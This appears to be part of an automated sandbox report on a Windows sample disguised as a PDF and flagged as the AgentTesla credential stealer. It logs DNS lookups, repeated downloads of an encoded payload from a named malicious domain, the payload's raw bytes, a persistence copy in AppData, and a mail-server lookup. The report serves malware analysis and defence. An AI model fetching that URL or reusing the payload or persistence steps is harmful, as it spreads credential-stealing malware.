                                                      Feb 23, 2021 09:31:55.335468054 CET8.8.8.8192.168.2.40xe96No error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                      Feb 23, 2021 09:31:55.335468054 CET8.8.8.8192.168.2.40xe96No error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                      Feb 23, 2021 09:32:41.903660059 CET8.8.8.8192.168.2.40x5179No error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                      Feb 23, 2021 09:32:41.903660059 CET8.8.8.8192.168.2.40x5179No error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                      Feb 23, 2021 09:32:50.913300037 CET8.8.8.8192.168.2.40x632fNo error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                      Feb 23, 2021 09:32:50.913300037 CET8.8.8.8192.168.2.40x632fNo error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                      Feb 23, 2021 09:33:58.435498953 CET8.8.8.8192.168.2.40x62beNo error (0)mail.orienttech.com.qa162.241.85.66A (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • coroloboxorozor.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.449731172.67.172.1780C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Feb 23, 2021 09:31:55.421120882 CET1684OUTGET /base/008D1C43D45C0A742A0D32B591796DBD.html HTTP/1.1
                                                      Host: coroloboxorozor.com
                                                      Connection: Keep-Alive
                                                      Feb 23, 2021 09:31:55.522285938 CET1685INHTTP/1.1 200 OK
                                                      Date: Tue, 23 Feb 2021 08:31:55 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Set-Cookie: __cfduid=dc950d50823a3f78f8842068f1c799aeb1614069115; expires=Thu, 25-Mar-21 08:31:55 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                      Last-Modified: Mon, 22 Feb 2021 21:10:03 GMT
                                                      Vary: Accept-Encoding
                                                      X-Frame-Options: SAMEORIGIN
                                                      CF-Cache-Status: DYNAMIC
                                                      cf-request-id: 086f9d424200004c3ee703b000000001
                                                      Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9WsG7wXim0KrN9jNbihYYsdftrCPjt7SgRQ5DDrJalxV6o3vJIsmqVun5nHLMckxJOBBvhihddmlpT5gUS63WCbG%2BkuErFa3BFF8C2nzKZz7iXr0"}]}
                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 625f97e39d6a4c3e-AMS
                                                      Data Raw: 37 63 39 39 0d 0a 3c 70 3e 4d 4d 6f 69 7a 6f 70 62 62 6f 7a 6f 4c 6f 7a 6f 7a 6f 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 58 4b 4b 6f 58 4b 4b 6f 7a 6f 7a 6f 70 52 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 49 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 70 58 52 6f 7a 6f 7a 6f 7a 6f 70 62 6f 4c 70 6f 70 52 49 6f 70 62 6f 7a 6f 70 52 7a 6f 69 6f 58 7a 4b 6f 4c 4c 6f 70 52 62 6f 70 6f 4d 49 6f 58 7a 4b 6f 4c 4c 6f 52 62 6f 70 7a 62 6f 70 7a 4b 6f 70 70 4b 6f 4c 58 6f 70 70 58 6f 70 70 62 6f 70 70 70 6f 70 7a 4c 6f 70 70 62 6f 69 4d 6f 70 7a 69 6f 4c 58 6f 69 69 6f 69 4d 6f 70 70 7a 6f 70 70 7a 6f 70 70 70 6f 70 70 49 6f 4c 58 6f 69 52 6f 70 7a 70 6f 4c 58 6f 70 70 62 6f 70 70 4d 6f 70 70 7a 6f 4c 58 6f 70 7a 4b 6f 70 70 7a 6f 4c 58 6f 49 52 6f 4d 69 6f 52 4c 6f 4c 58 6f 70 7a 69 6f 70 70 70 6f 70 7a 7a 6f 70 7a 70 6f 62 49 6f 70 4c 6f 70 4c 6f 70 7a 6f 4c 49 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 52 7a 6f 49 69 6f 7a 6f 7a 6f 4d 49 6f 70 6f 4c 6f 7a 6f 4d 49 6f 70 62 58 6f 62 70 6f 70 52 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 58 58 62 6f 7a 6f 4c 62 6f 7a 6f 70 70 6f 70 6f 52 7a 6f 7a 6f 7a 6f 70 70 52 6f 62 6f 7a 6f 7a 6f 49 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 58 4c 52 6f 70 62 52 6f 62 6f 7a 6f 7a 6f 4c 58 6f 7a 6f 7a 6f 7a 6f 70 49 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 70 58 52 6f 7a 6f 4c 58 6f 7a 6f 7a 6f 7a 6f 58 6f 7a 6f 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f
                                                      Data Ascii: 7c99<p>MMoizopbbozoLozozozobozozozoXKKoXKKozozopRbozozozozozozozoIbozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozopXRozozozopboLpopRIopbozopRzoioXzKoLLopRbopoMIoXzKoLLoRbopzbopzKoppKoLXoppXoppbopppopzLoppboiMopzioLXoiioiMoppzoppzopppoppIoLXoiRopzpoLXoppboppMoppzoLXopzKoppzoLXoIRoMioRLoLXopziopppopzzopzpobIopLopLopzoLIozozozozozozozoRzoIiozozoMIopoLozoMIopbXobpopRzozozozozozozozozoXXbozoLbozoppopoRzozozoppRobozozoIozozozozozozoXLRopbRobozozoLXozozozopIzobozozozozopXRozoLXozozozoXozozobozozozozozozozobozozozozozozo


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      1192.168.2.449750104.21.71.23080C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Feb 23, 2021 09:32:41.990319014 CET3588OUTGET /base/008D1C43D45C0A742A0D32B591796DBD.html HTTP/1.1
                                                      Host: coroloboxorozor.com
                                                      Connection: Keep-Alive
                                                      Feb 23, 2021 09:32:42.586678028 CET3591INHTTP/1.1 200 OK
                                                      Date: Tue, 23 Feb 2021 08:32:42 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Set-Cookie: __cfduid=da5ed9202205d82c93dc7ad00ba5fc2c21614069162; expires=Thu, 25-Mar-21 08:32:42 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                      Last-Modified: Mon, 22 Feb 2021 21:10:03 GMT
                                                      Vary: Accept-Encoding
                                                      X-Frame-Options: SAMEORIGIN
                                                      CF-Cache-Status: DYNAMIC
                                                      cf-request-id: 086f9df82c0000d8c1c9a94000000001
                                                      Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=QOb3Deeon02wuxkzT0wxtDetJ8%2Btqb92d4RT9LdOygqtVVXKCxTgvPUI19Pk4fG%2BlSCWLUfWlOjpqNby35Op3n4DVuOPQAcYVO%2Bi1Ncru%2FMu5jPW"}],"group":"cf-nel"}
                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 625f9906ac11d8c1-AMS
                                                      Data Raw: 65 63 31 0d 0a 3c 70 3e 4d 4d 6f 69 7a 6f 70 62 62 6f 7a 6f 4c 6f 7a 6f 7a 6f 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 58 4b 4b 6f 58 4b 4b 6f 7a 6f 7a 6f 70 52 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 49 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 70 58 52 6f 7a 6f 7a 6f 7a 6f 70 62 6f 4c 70 6f 70 52 49 6f 70 62 6f 7a 6f 70 52 7a 6f 69 6f 58 7a 4b 6f 4c 4c 6f 70 52 62 6f 70 6f 4d 49 6f 58 7a 4b 6f 4c 4c 6f 52 62 6f 70 7a 62 6f 70 7a 4b 6f 70 70 4b 6f 4c 58 6f 70 70 58 6f 70 70 62 6f 70 70 70 6f 70 7a 4c 6f 70 70 62 6f 69 4d 6f 70 7a 69 6f 4c 58 6f 69 69 6f 69 4d 6f 70 70 7a 6f 70 70 7a 6f 70 70 70 6f 70 70 49 6f 4c 58 6f 69 52 6f 70 7a 70 6f 4c 58 6f 70 70 62 6f 70 70 4d 6f 70 70 7a 6f 4c 58 6f 70 7a 4b 6f 70 70 7a 6f 4c 58 6f 49 52 6f 4d 69 6f 52 4c 6f 4c 58 6f 70 7a 69 6f 70 70 70 6f 70 7a 7a 6f 70 7a 70 6f 62 49 6f 70 4c 6f 70 4c 6f 70 7a 6f 4c 49 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 52 7a 6f 49 69 6f 7a 6f 7a 6f 4d 49 6f 70 6f 4c 6f 7a 6f 4d 49 6f 70 62 58 6f 62 70 6f 70 52 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 58 58 62 6f 7a 6f 4c 62 6f 7a 6f 70 70 6f 70 6f 52 7a 6f 7a 6f 7a 6f 70 70 52 6f 62 6f 7a 6f 7a 6f 49 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 58 4c 52 6f 70 62 52 6f 62 6f 7a 6f 7a 6f 4c 58 6f 7a 6f 7a 6f 7a 6f 70 49 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 70 58 52 6f 7a 6f 4c 58 6f 7a 6f 7a 6f 7a 6f 58 6f 7a 6f 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 7a
                                                      Data Ascii: ec1<p>MMoizopbbozoLozozozobozozozoXKKoXKKozozopRbozozozozozozozoIbozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozopXRozozozopboLpopRIopbozopRzoioXzKoLLopRbopoMIoXzKoLLoRbopzbopzKoppKoLXoppXoppbopppopzLoppboiMopzioLXoiioiMoppzoppzopppoppIoLXoiRopzpoLXoppboppMoppzoLXopzKoppzoLXoIRoMioRLoLXopziopppopzzopzpobIopLopLopzoLIozozozozozozozoRzoIiozozoMIopoLozoMIopbXobpopRzozozozozozozozozoXXbozoLbozoppopoRzozozoppRobozozoIozozozozozozoXLRopbRobozozoLXozozozopIzobozozozozopXRozoLXozozozoXozozobozozozozozozozobozozozoz


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      2192.168.2.449763172.67.172.1780C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Feb 23, 2021 09:32:51.002384901 CET5498OUTGET /base/008D1C43D45C0A742A0D32B591796DBD.html HTTP/1.1
                                                      Host: coroloboxorozor.com
                                                      Connection: Keep-Alive
                                                      Feb 23, 2021 09:32:51.121426105 CET5519INHTTP/1.1 200 OK
                                                      Date: Tue, 23 Feb 2021 08:32:51 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Set-Cookie: __cfduid=d81affeca7cd9eb6e8b1748d7d3df39cb1614069171; expires=Thu, 25-Mar-21 08:32:51 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                      Last-Modified: Mon, 22 Feb 2021 21:10:03 GMT
                                                      Vary: Accept-Encoding
                                                      X-Frame-Options: SAMEORIGIN
                                                      CF-Cache-Status: DYNAMIC
                                                      cf-request-id: 086f9e1b6000000bc17caf0000000001
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2B8ppNaQ2nqbApn6T%2BBzyLTDWm7simwrXlHrCsCE0K4w8ApGSsTt5IrIzMiVXMj%2BFy9Ir8ngZyuCpZy7Oud78aoUSF4hOwUfVPo3jGdJKCCg6iX9G"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 625f993f093c0bc1-AMS
                                                      Data Raw: 37 63 39 35 0d 0a 3c 70 3e 4d 4d 6f 69 7a 6f 70 62 62 6f 7a 6f 4c 6f 7a 6f 7a 6f 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 58 4b 4b 6f 58 4b 4b 6f 7a 6f 7a 6f 70 52 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 49 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 70 58 52 6f 7a 6f 7a 6f 7a 6f 70 62 6f 4c 70 6f 70 52 49 6f 70 62 6f 7a 6f 70 52 7a 6f 69 6f 58 7a 4b 6f 4c 4c 6f 70 52 62 6f 70 6f 4d 49 6f 58 7a 4b 6f 4c 4c 6f 52 62 6f 70 7a 62 6f 70 7a 4b 6f 70 70 4b 6f 4c 58 6f 70 70 58 6f 70 70 62 6f 70 70 70 6f 70 7a 4c 6f 70 70 62 6f 69 4d 6f 70 7a 69 6f 4c 58 6f 69 69 6f 69 4d 6f 70 70 7a 6f 70 70 7a 6f 70 70 70 6f 70 70 49 6f 4c 58 6f 69 52 6f 70 7a 70 6f 4c 58 6f 70 70 62 6f 70 70 4d 6f 70 70 7a 6f 4c 58 6f 70 7a 4b 6f 70 70 7a 6f 4c 58 6f 49 52 6f 4d 69 6f 52 4c 6f 4c 58 6f 70 7a 69 6f 70 70 70 6f 70 7a 7a 6f 70 7a 70 6f 62 49 6f 70 4c 6f 70 4c 6f 70 7a 6f 4c 49 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 52 7a 6f 49 69 6f 7a 6f 7a 6f 4d 49 6f 70 6f 4c 6f 7a 6f 4d 49 6f 70 62 58 6f 62 70 6f 70 52 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 58 58 62 6f 7a 6f 4c 62 6f 7a 6f 70 70 6f 70 6f 52 7a 6f 7a 6f 7a 6f 70 70 52 6f 62 6f 7a 6f 7a 6f 49 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 58 4c 52 6f 70 62 52 6f 62 6f 7a 6f 7a 6f 4c 58 6f 7a 6f 7a 6f 7a 6f 70 49 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 70 58 52 6f 7a 6f 4c 58 6f 7a 6f 7a 6f 7a 6f 58 6f 7a 6f 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 7a 6f
                                                      Data Ascii: 7c95<p>MMoizopbbozoLozozozobozozozoXKKoXKKozozopRbozozozozozozozoIbozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozopXRozozozopboLpopRIopbozopRzoioXzKoLLopRbopoMIoXzKoLLoRbopzbopzKoppKoLXoppXoppbopppopzLoppboiMopzioLXoiioiMoppzoppzopppoppIoLXoiRopzpoLXoppboppMoppzoLXopzKoppzoLXoIRoMioRLoLXopziopppopzzopzpobIopLopLopzoLIozozozozozozozoRzoIiozozoMIopoLozoMIopbXobpopRzozozozozozozozozoXXbozoLbozoppopoRzozozoppRobozozoIozozozozozozoXLRopbRobozozoLXozozozopIzobozozozozopXRozoLXozozozoXozozobozozozozozozozobozozozozo


                                                      Code Manipulations

                                                      Statistics

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Start time:09:31:53
                                                      Start date:23/02/2021
                                                      Path:C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\Desktop\0603321WG_0_1 pdf.exe'
                                                      Imagebase:0x810000
                                                      File size:30816 bytes
                                                      MD5 hash:9844048A2B7081D223139F100B0FF486
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.679176630.00000000047A2000.00000004.00000001.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      General

                                                      Start time:09:32:00
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                      Imagebase:0x11d0000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:32:00
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff724c50000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:32:00
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:timeout 1
                                                      Imagebase:0xf10000
                                                      File size:26112 bytes
                                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:32:04
                                                      Start date:23/02/2021
                                                      Path:C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                                                      Imagebase:0x7c0000
                                                      File size:30816 bytes
                                                      MD5 hash:9844048A2B7081D223139F100B0FF486
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.909029563.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.913675806.0000000002AC1000.00000004.00000001.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      General

                                                      Start time:09:32:06
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 276
                                                      Imagebase:0xbb0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      General

                                                      Start time:09:32:39
                                                      Start date:23/02/2021
                                                      Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                                                      Imagebase:0xe40000
                                                      File size:30816 bytes
                                                      MD5 hash:9844048A2B7081D223139F100B0FF486
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.850762818.00000000050CD000.00000004.00000001.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 22%, ReversingLabs
                                                      Reputation:low

                                                      General

                                                      Start time:09:32:47
                                                      Start date:23/02/2021
                                                      Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                                                      Imagebase:0x170000
                                                      File size:30816 bytes
                                                      MD5 hash:9844048A2B7081D223139F100B0FF486
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.879172967.00000000064E4000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.883671585.0000000006979000.00000004.00000001.sdmp, Author: Joe Security
                                                      Reputation:low

                                                      General

                                                      Start time:09:32:58
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                      Imagebase:0x11d0000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:32:58
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff724c50000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:32:58
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                      Imagebase:0x11d0000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:32:59
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff724c50000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:32:59
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:timeout 1
                                                      Imagebase:0xf10000
                                                      File size:26112 bytes
                                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:32:59
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:timeout 1
                                                      Imagebase:0xf10000
                                                      File size:26112 bytes
                                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Start time:09:33:03
                                                      Start date:23/02/2021
                                                      Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                      Imagebase:0xf30000
                                                      File size:30816 bytes
                                                      MD5 hash:9844048A2B7081D223139F100B0FF486
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.912580946.0000000003191000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.912580946.0000000003191000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.909001517.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                      General

                                                      Start time:09:33:03
                                                      Start date:23/02/2021
                                                      Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                      Imagebase:0xce0000
                                                      File size:30816 bytes
                                                      MD5 hash:9844048A2B7081D223139F100B0FF486
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.808427575.0000000003011000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001C.00000002.806272942.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                      General

                                                      Start time:09:33:06
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1464
                                                      Imagebase:0xbb0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      General

                                                      Start time:09:33:08
                                                      Start date:23/02/2021
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 1896
                                                      Imagebase:0xbb0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      Disassembly

                                                      Code Analysis

                                                      Reset < >